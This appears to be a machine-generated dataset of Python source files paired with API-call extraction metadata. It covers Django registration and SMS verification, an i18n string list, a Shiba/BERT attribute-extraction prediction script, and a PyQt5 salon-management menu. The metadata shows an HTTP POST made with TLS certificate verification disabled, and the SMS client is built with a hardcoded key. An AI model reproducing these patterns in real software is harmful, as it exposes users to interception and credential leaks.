return HttpResponse(json.dumps(return_value, ensure_ascii=False))
# success and created new user
else:
return HttpResponse('Authen Error', status=500)
else:
uf = RegisterForm()
return render_to_response('register.html', {'uf': uf})
mobsms = MobSMS("5fc5a301e100") ### add real keys here!!!
@hook("verify")
def verify(meta, data):
uid = meta['uid']
vcode = data['code']
user = User.objects.get(id=uid)
user.verify_code = vcode
user.verified = False
res = mobsms.verify_sms_code(user.region_num, user.phone_num, vcode)
    if json.loads(res)['status'] == 200:
user.verified = True
user.save()
return '', '', res
|
[
"colock.utils.hook",
"django.shortcuts.render_to_response",
"django.forms.IntegerField",
"json.loads",
"django.http.HttpResponse",
"django.utils.timezone.now",
"json.dumps",
"requests.post",
"django.forms.CharField",
"user_manage.models.User.objects.get"
] |
[((2660, 2674), 'colock.utils.hook', 'hook', (['"""verify"""'], {}), "('verify')\n", (2664, 2674), False, 'from colock.utils import hook\n'), ((570, 590), 'django.forms.IntegerField', 'forms.IntegerField', ([], {}), '()\n', (588, 590), False, 'from django import forms\n'), ((641, 661), 'django.forms.IntegerField', 'forms.IntegerField', ([], {}), '()\n', (659, 661), False, 'from django import forms\n'), ((673, 703), 'django.forms.CharField', 'forms.CharField', ([], {'max_length': '(32)'}), '(max_length=32)\n', (688, 703), False, 'from django import forms\n'), ((2551, 2598), 'django.shortcuts.render_to_response', 'render_to_response', (['"""register.html"""', "{'uf': uf}"], {}), "('register.html', {'uf': uf})\n", (2569, 2598), False, 'from django.shortcuts import render, render_to_response\n'), ((2757, 2781), 'user_manage.models.User.objects.get', 'User.objects.get', ([], {'id': 'uid'}), '(id=uid)\n', (2773, 2781), False, 'from user_manage.models import User\n'), ((1046, 1101), 'requests.post', 'requests.post', (['self.verify_url'], {'data': 'data', 'verify': '(False)'}), '(self.verify_url, data=data, verify=False)\n', (1059, 1101), False, 'import requests\n'), ((1200, 1227), 'json.dumps', 'json.dumps', (["{'status': 500}"], {}), "({'status': 500})\n", (1210, 1227), False, 'import json\n'), ((1708, 1722), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1720, 1722), False, 'from django.utils import timezone\n'), ((2920, 2935), 'json.loads', 'json.loads', (['res'], {}), '(res)\n', (2930, 2935), False, 'import json\n'), ((1415, 1430), 'json.loads', 'json.loads', (['res'], {}), '(res)\n', (1425, 1430), False, 'import json\n'), ((2461, 2501), 'django.http.HttpResponse', 'HttpResponse', (['"""Authen Error"""'], {'status': '(500)'}), "('Authen Error', status=500)\n", (2473, 2501), False, 'from django.http import HttpResponse\n'), ((2327, 2371), 'json.dumps', 'json.dumps', (['return_value'], {'ensure_ascii': '(False)'}), '(return_value, ensure_ascii=False)\n', (2337, 2371), False, 'import json\n')]
|
"""
This file contains strings which need i18n but don't have a place in any file.
They may appear only in the DB, so they can't be detected unless written out explicitly.
"""
from django.utils.translation import gettext_lazy as _
I18N_NEEDED = [
_('T00 member'),
_('T01 member'),
_('T02 member'),
_('T11 member'),
_('T12 member'),
_('T21 member'),
_('T22 member'),
_('T31 member'),
_('T32 member'),
_('T00 supervisor'),
_('T01 supervisor'),
_('T02 supervisor'),
_('T11 supervisor'),
_('T12 supervisor'),
_('T21 supervisor'),
_('T22 supervisor'),
_('T31 supervisor'),
_('T32 supervisor'),
]
|
[
"django.utils.translation.gettext_lazy"
] |
[((255, 270), 'django.utils.translation.gettext_lazy', '_', (['"""T00 member"""'], {}), "('T00 member')\n", (256, 270), True, 'from django.utils.translation import gettext_lazy as _\n'), ((276, 291), 'django.utils.translation.gettext_lazy', '_', (['"""T01 member"""'], {}), "('T01 member')\n", (277, 291), True, 'from django.utils.translation import gettext_lazy as _\n'), ((297, 312), 'django.utils.translation.gettext_lazy', '_', (['"""T02 member"""'], {}), "('T02 member')\n", (298, 312), True, 'from django.utils.translation import gettext_lazy as _\n'), ((318, 333), 'django.utils.translation.gettext_lazy', '_', (['"""T11 member"""'], {}), "('T11 member')\n", (319, 333), True, 'from django.utils.translation import gettext_lazy as _\n'), ((339, 354), 'django.utils.translation.gettext_lazy', '_', (['"""T12 member"""'], {}), "('T12 member')\n", (340, 354), True, 'from django.utils.translation import gettext_lazy as _\n'), ((360, 375), 'django.utils.translation.gettext_lazy', '_', (['"""T21 member"""'], {}), "('T21 member')\n", (361, 375), True, 'from django.utils.translation import gettext_lazy as _\n'), ((381, 396), 'django.utils.translation.gettext_lazy', '_', (['"""T22 member"""'], {}), "('T22 member')\n", (382, 396), True, 'from django.utils.translation import gettext_lazy as _\n'), ((402, 417), 'django.utils.translation.gettext_lazy', '_', (['"""T31 member"""'], {}), "('T31 member')\n", (403, 417), True, 'from django.utils.translation import gettext_lazy as _\n'), ((423, 438), 'django.utils.translation.gettext_lazy', '_', (['"""T32 member"""'], {}), "('T32 member')\n", (424, 438), True, 'from django.utils.translation import gettext_lazy as _\n'), ((444, 463), 'django.utils.translation.gettext_lazy', '_', (['"""T00 supervisor"""'], {}), "('T00 supervisor')\n", (445, 463), True, 'from django.utils.translation import gettext_lazy as _\n'), ((469, 488), 'django.utils.translation.gettext_lazy', '_', (['"""T01 supervisor"""'], {}), "('T01 supervisor')\n", (470, 488), True, 'from django.utils.translation import gettext_lazy as _\n'), ((494, 513), 'django.utils.translation.gettext_lazy', '_', (['"""T02 supervisor"""'], {}), "('T02 supervisor')\n", (495, 513), True, 'from django.utils.translation import gettext_lazy as _\n'), ((519, 538), 'django.utils.translation.gettext_lazy', '_', (['"""T11 supervisor"""'], {}), "('T11 supervisor')\n", (520, 538), True, 'from django.utils.translation import gettext_lazy as _\n'), ((544, 563), 'django.utils.translation.gettext_lazy', '_', (['"""T12 supervisor"""'], {}), "('T12 supervisor')\n", (545, 563), True, 'from django.utils.translation import gettext_lazy as _\n'), ((569, 588), 'django.utils.translation.gettext_lazy', '_', (['"""T21 supervisor"""'], {}), "('T21 supervisor')\n", (570, 588), True, 'from django.utils.translation import gettext_lazy as _\n'), ((594, 613), 'django.utils.translation.gettext_lazy', '_', (['"""T22 supervisor"""'], {}), "('T22 supervisor')\n", (595, 613), True, 'from django.utils.translation import gettext_lazy as _\n'), ((619, 638), 'django.utils.translation.gettext_lazy', '_', (['"""T31 supervisor"""'], {}), "('T31 supervisor')\n", (620, 638), True, 'from django.utils.translation import gettext_lazy as _\n'), ((644, 663), 'django.utils.translation.gettext_lazy', '_', (['"""T32 supervisor"""'], {}), "('T32 supervisor')\n", (645, 663), True, 'from django.utils.translation import gettext_lazy as _\n')]
|
#-*-coding:utf-8-*-
import os
import re
import json
import time
import glob
import random
import argparse
import numpy as np
import pandas as pd
from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
from transformers import AutoTokenizer, AutoModel
from shiba import Shiba, CodepointTokenizer, get_pretrained_state_dict
from datasets import CharbertDataset, ShibaDataset, collate_fn
from models import CharbertForSequenceLabeling, ShibaForSequenceLabeling
from utils import epoch_time, decode_attr_bio, operate_bio, set_seed
def parse_arg():
parser = argparse.ArgumentParser()
parser.add_argument("--input_plain_path", type=str)
parser.add_argument("--input_annotation_path", type=str)
parser.add_argument("--output_path", type=str)
parser.add_argument("--category", type=str)
parser.add_argument("--block", type=str)
parser.add_argument("--model", type=str)
parser.add_argument("--batch_size", type=int)
parser.add_argument("--cuda", type=int)
return parser.parse_args()
if __name__ == "__main__":
args = parse_arg()
INPUT_PLAIN_PATH = args.input_plain_path
INPUT_ANNOTATION_PATH = args.input_annotation_path
OUTPUT_PATH = args.output_path
CATEGORY = args.category
BLOCK = args.block
MODEL = args.model
BATCH_SIZE = args.batch_size
CUDA = args.cuda
OUTPUT_PATH = OUTPUT_PATH+CATEGORY.lower()+'_'+MODEL.lower()+'_'+BLOCK.lower()+'/'
with open(OUTPUT_PATH+'params.json', 'r') as f:
params = dict(json.load(f))
SEED = params['seed']
MAX_LENGTH = params['max_length']
set_seed(SEED)
device = torch.device("cuda:"+str(CUDA) if torch.cuda.is_available() else "cpu")
print('read annotation files')
df = pd.read_json(INPUT_ANNOTATION_PATH+CATEGORY+'_dist.json', orient='records', lines=True)
attr2idx = {attr:i for i, attr in enumerate(sorted(set(df['attribute'])))}
idx2attr = {v:k for k, v in attr2idx.items()}
bio2idx = {'B':0, 'I':1, 'O':2}
idx2bio = {v:k for k, v in bio2idx.items()}
page_id_list = [int(path.split('/')[-1][:-4]) for path in sorted(glob.glob(INPUT_PLAIN_PATH+CATEGORY+'/*'))]
print('read plain files')
pred_page2plain = {}
for page_id in page_id_list:
with open(INPUT_PLAIN_PATH+CATEGORY+'/'+str(page_id)+'.txt', 'r') as f:
pred_page2plain[page_id] = f.readlines()
print('load models')
if MODEL == 'charbert':
pretrained_model = 'cl-tohoku/bert-base-japanese-char-whole-word-masking'
tokenizer = AutoTokenizer.from_pretrained(pretrained_model)
bert = AutoModel.from_pretrained(pretrained_model)
model = CharbertForSequenceLabeling(bert, attr_size=len(attr2idx), label_size=len(bio2idx))
else:
tokenizer = CodepointTokenizer()
shiba = Shiba()
shiba.load_state_dict(get_pretrained_state_dict())
model = ShibaForSequenceLabeling(shiba, attr_size=len(attr2idx), label_size=len(bio2idx))
model.load_state_dict(torch.load(OUTPUT_PATH+'best_model.pt'))
bar = tqdm(total=len(pred_page2plain))
result_list = []
for idx, page_id in enumerate(list(pred_page2plain.keys())):
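        # run prediction one page at a time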
page2plain = {page_id:pred_page2plain[page_id]}
if MODEL == 'charbert':
ds = CharbertDataset(page2plain, tokenizer, attr2idx, bio2idx, MAX_LENGTH, BLOCK, None)
else:
ds = ShibaDataset(page2plain, tokenizer, attr2idx, bio2idx, MAX_LENGTH, BLOCK, None)
dl = DataLoader(ds, batch_size=BATCH_SIZE, collate_fn=collate_fn)
_total_labels, _total_preds = torch.LongTensor(), torch.LongTensor()
for inputs, attention_masks, labels in dl:
with torch.no_grad():
model.to(device).eval()
output = model(inputs.to(device), attention_masks.to(device), labels.to(device))
probs = torch.stack(output[1]).transpose(0, 1).cpu()
preds = probs.argmax(axis=-1)
_total_labels = torch.cat([_total_labels, labels.transpose(0, 1).reshape(labels.shape[1], -1)], axis=1)
_total_preds = torch.cat([_total_preds, preds.transpose(0, 1).reshape(preds.shape[1], -1)], axis=1)
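        # keep only positions with real labels (positions labeled -1 are treated as padding)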
total_preds = _total_preds[(_total_labels != -1).nonzero(as_tuple=True)].reshape(_total_preds.shape[0], -1)
bio_preds = decode_attr_bio(total_preds.tolist(), idx2attr, idx2bio)
new_char_idx_dict = {page_dict['new_char_idx']:page_dict \
for page_dict in ds.df_new[page_id].to_dict('records')}
for attr_idx, bios in enumerate(bio_preds):
pre_bio = 'O'
result = {'page_id':page_id, 'title':ds.page2title[page_id], \
'attribute':idx2attr[attr_idx], 'text_offset':{}}
for idx, bio in enumerate(bios):
bio = bio.split('-')[0]
ope = operate_bio(pre_bio, bio)
if ope['insert'] == True:
result_list.append(result)
result = {'page_id':page_id, 'title':ds.page2title[page_id], \
'attribute':idx2attr[attr_idx], 'text_offset':{}}
if ope['start'] == True:
result['text_offset']['start'] = {
'line_id': new_char_idx_dict[idx]['line_id'],
'offset': new_char_idx_dict[idx]['offset']
}
result['text_offset']['text'] = new_char_idx_dict[idx]['char']
if ope['end'] == True:
result['text_offset']['end'] = {
'line_id': new_char_idx_dict[idx]['line_id'],
'offset': new_char_idx_dict[idx]['offset']+1
}
if ope['start'] == False:
result['text_offset']['text'] += new_char_idx_dict[idx]['char']
pre_bio = bio
if bio in ['B', 'I']:
result_list.append(result)
bar.update(1)
df_result = pd.DataFrame(result_list)
df_result.to_json(OUTPUT_PATH+'predict.json', orient='records', force_ascii=False, lines=True)
|
[
"argparse.ArgumentParser",
"shiba.CodepointTokenizer",
"utils.set_seed",
"transformers.AutoModel.from_pretrained",
"glob.glob",
"torch.no_grad",
"pandas.DataFrame",
"torch.utils.data.DataLoader",
"torch.load",
"shiba.Shiba",
"transformers.AutoTokenizer.from_pretrained",
"torch.cuda.is_available",
"utils.operate_bio",
"datasets.CharbertDataset",
"json.load",
"torch.stack",
"torch.LongTensor",
"pandas.read_json",
"datasets.ShibaDataset",
"shiba.get_pretrained_state_dict"
] |
[((580, 605), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (603, 605), False, 'import argparse\n'), ((1655, 1669), 'utils.set_seed', 'set_seed', (['SEED'], {}), '(SEED)\n', (1663, 1669), False, 'from utils import epoch_time, decode_attr_bio, operate_bio, set_seed\n'), ((1805, 1901), 'pandas.read_json', 'pd.read_json', (["(INPUT_ANNOTATION_PATH + CATEGORY + '_dist.json')"], {'orient': '"""records"""', 'lines': '(True)'}), "(INPUT_ANNOTATION_PATH + CATEGORY + '_dist.json', orient=\n 'records', lines=True)\n", (1817, 1901), True, 'import pandas as pd\n'), ((6269, 6294), 'pandas.DataFrame', 'pd.DataFrame', (['result_list'], {}), '(result_list)\n', (6281, 6294), True, 'import pandas as pd\n'), ((2648, 2695), 'transformers.AutoTokenizer.from_pretrained', 'AutoTokenizer.from_pretrained', (['pretrained_model'], {}), '(pretrained_model)\n', (2677, 2695), False, 'from transformers import AutoTokenizer, AutoModel\n'), ((2711, 2754), 'transformers.AutoModel.from_pretrained', 'AutoModel.from_pretrained', (['pretrained_model'], {}), '(pretrained_model)\n', (2736, 2754), False, 'from transformers import AutoTokenizer, AutoModel\n'), ((2893, 2913), 'shiba.CodepointTokenizer', 'CodepointTokenizer', ([], {}), '()\n', (2911, 2913), False, 'from shiba import Shiba, CodepointTokenizer, get_pretrained_state_dict\n'), ((2930, 2937), 'shiba.Shiba', 'Shiba', ([], {}), '()\n', (2935, 2937), False, 'from shiba import Shiba, CodepointTokenizer, get_pretrained_state_dict\n'), ((3129, 3170), 'torch.load', 'torch.load', (["(OUTPUT_PATH + 'best_model.pt')"], {}), "(OUTPUT_PATH + 'best_model.pt')\n", (3139, 3170), False, 'import torch\n'), ((3637, 3697), 'torch.utils.data.DataLoader', 'DataLoader', (['ds'], {'batch_size': 'BATCH_SIZE', 'collate_fn': 'collate_fn'}), '(ds, batch_size=BATCH_SIZE, collate_fn=collate_fn)\n', (3647, 3697), False, 'from torch.utils.data import DataLoader\n'), ((1560, 1572), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1569, 1572), False, 'import json\n'), ((1717, 1742), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1740, 1742), False, 'import torch\n'), ((2968, 2995), 'shiba.get_pretrained_state_dict', 'get_pretrained_state_dict', ([], {}), '()\n', (2993, 2995), False, 'from shiba import Shiba, CodepointTokenizer, get_pretrained_state_dict\n'), ((3418, 3504), 'datasets.CharbertDataset', 'CharbertDataset', (['page2plain', 'tokenizer', 'attr2idx', 'bio2idx', 'MAX_LENGTH', 'BLOCK', 'None'], {}), '(page2plain, tokenizer, attr2idx, bio2idx, MAX_LENGTH, BLOCK,\n None)\n', (3433, 3504), False, 'from datasets import CharbertDataset, ShibaDataset, collate_fn\n'), ((3544, 3623), 'datasets.ShibaDataset', 'ShibaDataset', (['page2plain', 'tokenizer', 'attr2idx', 'bio2idx', 'MAX_LENGTH', 'BLOCK', 'None'], {}), '(page2plain, tokenizer, attr2idx, bio2idx, MAX_LENGTH, BLOCK, None)\n', (3556, 3623), False, 'from datasets import CharbertDataset, ShibaDataset, collate_fn\n'), ((3745, 3763), 'torch.LongTensor', 'torch.LongTensor', ([], {}), '()\n', (3761, 3763), False, 'import torch\n'), ((3765, 3783), 'torch.LongTensor', 'torch.LongTensor', ([], {}), '()\n', (3781, 3783), False, 'import torch\n'), ((2197, 2242), 'glob.glob', 'glob.glob', (["(INPUT_PLAIN_PATH + CATEGORY + '/*')"], {}), "(INPUT_PLAIN_PATH + CATEGORY + '/*')\n", (2206, 2242), False, 'import glob\n'), ((3852, 3867), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3865, 3867), False, 'import torch\n'), ((5092, 5117), 'utils.operate_bio', 'operate_bio', (['pre_bio', 'bio'], {}), '(pre_bio, bio)\n', (5103, 5117), False, 'from utils import epoch_time, decode_attr_bio, operate_bio, set_seed\n'), ((4046, 4068), 'torch.stack', 'torch.stack', (['output[1]'], {}), '(output[1])\n', (4057, 4068), False, 'import torch\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# theme and sys for linking signals
import sys
# other forms
import managerMenu as managermenu
import staffForm as staffform
import stockForm as stockform
import treatmentsForm as treatmentsform
import appointmentForm as appointmentform
import chartForm as chartform
import customerForm as customerform
# GUI libraries
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMainWindow
from PyQt5.QtCore import pyqtSignal, QObject
# Theme
import qdarkstyle
class Ui_MainMenu(QMainWindow, QObject):
valueChange = pyqtSignal(int)
def setupUi(self, MainMenu):
# 'global' information
MainMenu.setObjectName("MainMenu")
MainMenu.resize(1280, 720)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainMenu.sizePolicy().hasHeightForWidth())
MainMenu.setSizePolicy(sizePolicy)
self.centralWidget = QtWidgets.QWidget(MainMenu)
self.centralWidget.setObjectName("centralWidget")
# True is manager
# False is staff
if sys.argv[2] == 'True':
self.accessLevel = True
else:
self.accessLevel = False
self.userLoggedIn = sys.argv[1]
# creating navigation buttons
def navButtons(self):
self.navManagerMenu = QtWidgets.QPushButton(self.centralWidget)
self.navManagerMenu.setGeometry(QtCore.QRect(11, 40, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navManagerMenu.setFont(font)
self.navManagerMenu.setObjectName("navManagerMenu")
self.navManagerMenu.setEnabled(self.accessLevel)
self.navCharts = QtWidgets.QPushButton(self.centralWidget)
self.navCharts.setGeometry(QtCore.QRect(10, 240, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navCharts.setFont(font)
self.navCharts.setObjectName("navCharts")
self.navAppointments = QtWidgets.QPushButton(self.centralWidget)
self.navAppointments.setGeometry(QtCore.QRect(10, 160, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navAppointments.setFont(font)
self.navAppointments.setObjectName("navAppointments")
self.navCustomers = QtWidgets.QPushButton(self.centralWidget)
self.navCustomers.setGeometry(QtCore.QRect(10, 120, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navCustomers.setFont(font)
self.navCustomers.setObjectName("navCustomers")
self.navStaff = QtWidgets.QPushButton(self.centralWidget)
self.navStaff.setGeometry(QtCore.QRect(10, 80, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navStaff.setFont(font)
self.navStaff.setObjectName("navStaff")
self.navStaff.setEnabled(self.accessLevel)
self.navStock = QtWidgets.QPushButton(self.centralWidget)
self.navStock.setGeometry(QtCore.QRect(10, 200, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navStock.setFont(font)
self.navStock.setObjectName("navStock")
self.navTreatments = QtWidgets.QPushButton(self.centralWidget)
self.navTreatments.setGeometry(QtCore.QRect(10, 280, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial")
self.navTreatments.setFont(font)
self.navTreatments.setObjectName("navTreatments")
# whos logged in
self.user = QtWidgets.QLabel(self.centralWidget)
self.user.setGeometry(QtCore.QRect(10, 320, 121, 29))
font = QtGui.QFont()
font.setFamily("Arial Black")
self.user.setFont(font)
self.user.setObjectName("user")
self.label = QtWidgets.QLabel(self.centralWidget)
self.label.setGeometry(QtCore.QRect(10, 11, 101, 17))
font = QtGui.QFont()
font.setFamily("Arial Black")
self.label.setFont(font)
self.label.setObjectName("label")
self.stackedWidget = QtWidgets.QStackedWidget(self.centralWidget)
self.stackedWidget.setGeometry(QtCore.QRect(140, 10, 1141, 691))
font = QtGui.QFont()
font.setFamily("Arial")
self.stackedWidget.setFont(font)
self.stackedWidget.setObjectName("stackedWidget")
# creation code
navButtons(self)
managermenu.createManagerMenu(self)
chartform.createChartForm(self)
staffform.createStaffForm(self)
customerform.createCustomerForm(self)
appointmentform.createAppointmentForm(self)
stockform.createStockForm(self)
treatmentsform.createTreatmentsForm(self)
# main window config
MainMenu.setCentralWidget(self.centralWidget)
self.mainToolBar = QtWidgets.QToolBar(MainMenu)
self.mainToolBar.setObjectName("mainToolBar")
MainMenu.addToolBar(QtCore.Qt.TopToolBarArea, self.mainToolBar)
self.statusBar = QtWidgets.QStatusBar(MainMenu)
self.statusBar.setObjectName("statusBar")
MainMenu.setStatusBar(self.statusBar)
self.retranslateUi(MainMenu)
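        # managers start on the manager menu page; staff start on appointments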
if self.accessLevel is True:
self.stackedWidget.setCurrentIndex(0)
else:
self.stackedWidget.setCurrentIndex(4)
QtCore.QMetaObject.connectSlotsByName(MainMenu)
def navigation(self):
# connecting the navigation buttons to the stacked widget
self.navManagerMenu.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(0))
self.navCharts.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(1))
self.navStaff.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(2))
self.navCustomers.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(3))
self.navAppointments.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(4))
self.navStock.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(5))
self.navTreatments.clicked.connect(lambda : self.stackedWidget.setCurrentIndex(6))
def retranslateUi(self, MainMenu):
# adding text to all the labels
_translate = QtCore.QCoreApplication.translate
MainMenu.setWindowTitle(_translate("MainMenu", "MainMenu"))
self.navManagerMenu.setText(_translate("MainMenu", "ManagerMenu"))
self.navCharts.setText(_translate("MainMenu", "Charts"))
self.navAppointments.setText(_translate("MainMenu", "Appointments"))
self.navCustomers.setText(_translate("MainMenu", "Customers"))
self.navStaff.setText(_translate("MainMenu", "Staff"))
self.navStock.setText(_translate("MainMenu", "Stock"))
self.navTreatments.setText(_translate("MainMenu", "Treatments"))
self.label.setText(_translate("MainMenu", "Navigation"))
self.label_5.setText(_translate("MainMenu", "Manager Menu"))
self.label_notifications.setText(_translate("MainMenu", "Notifications"))
self.label_7.setText(_translate("MainMenu", "Backup"))
self.btnBackup.setText(_translate("MainMenu", "Backup"))
self.user.setText(_translate("MainMenu", sys.argv[1]))
self.user.setAlignment(QtCore.Qt.AlignCenter)
self.label_4.setText(_translate("MainMenu", "To"))
self.label_2.setText(_translate("MainMenu", "Chart Type"))
self.cmbChartType.setItemText(0, _translate("MainMenu", "Most popular treatment"))
self.cmbChartType.setItemText(1, _translate("MainMenu", "Income"))
self.cmbChartType.setItemText(2, _translate("MainMenu", "Outgoing per stock type"))
self.label_3.setText(_translate("MainMenu", "From"))
self.btnChartCreate.setText(_translate("MainMenu", "Create"))
self.label_31.setText(_translate("MainMenu", "Charts"))
self.label_8.setText(_translate("MainMenu", "Staff Menu"))
self.label_9.setText(_translate("MainMenu", "Add new staff member"))
self.label_10.setText(_translate("MainMenu", "First name"))
self.label_staffsex.setText(_translate("MainMenu", "Staff sex"))
self.label_11.setText(_translate("MainMenu", "Surname"))
self.label_12.setText(_translate("MainMenu", "Username"))
self.label_13.setText(_translate("MainMenu", "Password"))
self.label_14.setText(_translate("MainMenu", "Is this user a manager?"))
self.checkBoxAdmin.setText(_translate("MainMenu", "Yes"))
self.label_15.setText(_translate("MainMenu", "Date of birth"))
self.label_16.setText(_translate("MainMenu", "StaffID"))
self.btnSaveStaff.setText(_translate("MainMenu", "Save"))
self.label_17.setText(_translate("MainMenu", "Search"))
self.btnStaffCancel.setText(_translate("MainMenu", "Cancel"))
self.label_18.setText(_translate("MainMenu", "Add new Customer"))
self.label_19.setText(_translate("MainMenu", "Email"))
self.label_20.setText(_translate("MainMenu", "Surname"))
self.label_21.setText(_translate("MainMenu", "Search"))
self.label_22.setText(_translate("MainMenu", "CustomerID"))
self.btnSaveCustomer.setText(_translate("MainMenu", "Save"))
self.label_23.setText(_translate("MainMenu", "Date of birth"))
self.label_24.setText(_translate("MainMenu", "Primary Contact info"))
self.label_25.setText(_translate("MainMenu", "Phone Number"))
self.label_26.setText(_translate("MainMenu", "First name"))
self.cmbCustomerContact.setItemText(0, _translate("MainMenu", "Phone number"))
self.cmbCustomerContact.setItemText(1, _translate("MainMenu", "Email address"))
self.label_27.setText(_translate("MainMenu", "Address"))
self.label_28.setText(_translate("MainMenu", "Postcode"))
self.label_29.setText(_translate("MainMenu", "Allergies"))
self.label_30.setText(_translate("MainMenu", "Customers"))
self.cmbCustomerSex.setItemText(0, _translate("MainMenu", "Male"))
self.cmbCustomerSex.setItemText(1, _translate("MainMenu", "Female"))
self.label_75.setText(_translate("MainMenu", "Sex"))
self.btnCustomerCancel.setText(_translate("MainMenu", "Cancel"))
self.label_62.setText(_translate("MainMenu", "Search"))
self.label_63.setText(_translate("MainMenu", "Date"))
self.label_65.setText(_translate("MainMenu", "AppointmentID"))
self.label_66.setText(_translate("MainMenu", "Customer"))
self.label_67.setText(_translate("MainMenu", "Add new Appointment"))
self.label_68.setText(_translate("MainMenu", "Amount Paid"))
self.label_70.setText(_translate("MainMenu", "Time"))
self.btnSaveAppointment.setText(_translate("MainMenu", "Save"))
self.label_72.setText(_translate("MainMenu", "Treatment"))
self.label_73.setText(_translate("MainMenu", "Staff"))
self.label_74.setText(_translate("MainMenu", "Appointments"))
        self.label_64.setText(_translate("MainMenu", "£"))
        self.label_69.setText(_translate("MainMenu", "£"))
self.label_71.setText(_translate("MainMenu", "Amount Due"))
self.btnAppointmentCancel.setText(_translate("MainMenu", "Cancel"))
self.label_76.setText(_translate("MainMenu", "Comment"))
self.label_77.setText(_translate("MainMenu", "Stock alert level"))
self.label_78.setText(_translate("MainMenu", "Add new Stock"))
self.label_81.setText(_translate("MainMenu", "StockID"))
self.btnSaveStock.setText(_translate("MainMenu", "Save"))
self.label_83.setText(_translate("MainMenu", "Amount left"))
self.label_84.setText(_translate("MainMenu", "Name"))
self.label_86.setText(_translate("MainMenu", "Search"))
self.btnStockCancel.setText(_translate("MainMenu", "Cancel"))
        self.label_87.setText(_translate("MainMenu", "£"))
self.label_88.setText(_translate("MainMenu", "Price"))
self.label_89.setText(_translate("MainMenu", "Stock"))
# labels for treatmentsform
        self.label_90.setText(_translate("MainMenu", "£"))
self.label_91.setText(_translate("MainMenu", "Search"))
self.label_92.setText(_translate("MainMenu", "Price"))
self.label_79.setText(_translate("MainMenu", "Stock amount to use"))
self.label_80.setText(_translate("MainMenu", "Add new Treatments"))
self.label_85.setText(_translate("MainMenu", "Name"))
self.label_82.setText(_translate("MainMenu", "TreatmentID"))
self.label_93.setText(_translate("MainMenu", "Stock name"))
self.btnTreatmentCancel.setText(_translate("MainMenu", "Cancel"))
self.btnSaveTreatment.setText(_translate("MainMenu", "Save"))
self.btnTreatmentAddStock.setText(_translate("MainMenu", "Add"))
self.label_94.setText(_translate("MainMenu", "Stock to use"))
self.label_95.setText(_translate("MainMenu", "Treatments"))
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
MainMenu = QtWidgets.QMainWindow()
ui = Ui_MainMenu()
ui.setupUi(MainMenu)
ui.navigation()
icon = QtGui.QIcon('database/company.png')
MainMenu.setWindowIcon(QtGui.QIcon(icon))
MainMenu.show()
sys.exit(app.exec_())
|
[
"PyQt5.QtCore.pyqtSignal",
"treatmentsForm.createTreatmentsForm",
"PyQt5.QtWidgets.QSizePolicy",
"PyQt5.QtWidgets.QPushButton",
"customerForm.createCustomerForm",
"appointmentForm.createAppointmentForm",
"PyQt5.QtWidgets.QApplication",
"PyQt5.QtWidgets.QToolBar",
"managerMenu.createManagerMenu",
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtWidgets.QWidget",
"qdarkstyle.load_stylesheet_pyqt5",
"PyQt5.QtCore.QRect",
"PyQt5.QtWidgets.QMainWindow",
"chartForm.createChartForm",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtGui.QIcon",
"staffForm.createStaffForm",
"PyQt5.QtWidgets.QStatusBar",
"PyQt5.QtGui.QFont",
"PyQt5.QtWidgets.QStackedWidget",
"stockForm.createStockForm"
] |
[((589, 604), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', (['int'], {}), '(int)\n', (599, 604), False, 'from PyQt5.QtCore import pyqtSignal, QObject\n'), ((13442, 13474), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (13464, 13474), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((13549, 13572), 'PyQt5.QtWidgets.QMainWindow', 'QtWidgets.QMainWindow', ([], {}), '()\n', (13570, 13572), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((13654, 13689), 'PyQt5.QtGui.QIcon', 'QtGui.QIcon', (['"""database/company.png"""'], {}), "('database/company.png')\n", (13665, 13689), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((770, 849), 'PyQt5.QtWidgets.QSizePolicy', 'QtWidgets.QSizePolicy', (['QtWidgets.QSizePolicy.Fixed', 'QtWidgets.QSizePolicy.Fixed'], {}), '(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n', (791, 849), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1086, 1113), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', (['MainMenu'], {}), '(MainMenu)\n', (1103, 1113), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4848, 4883), 'managerMenu.createManagerMenu', 'managermenu.createManagerMenu', (['self'], {}), '(self)\n', (4877, 4883), True, 'import managerMenu as managermenu\n'), ((4892, 4923), 'chartForm.createChartForm', 'chartform.createChartForm', 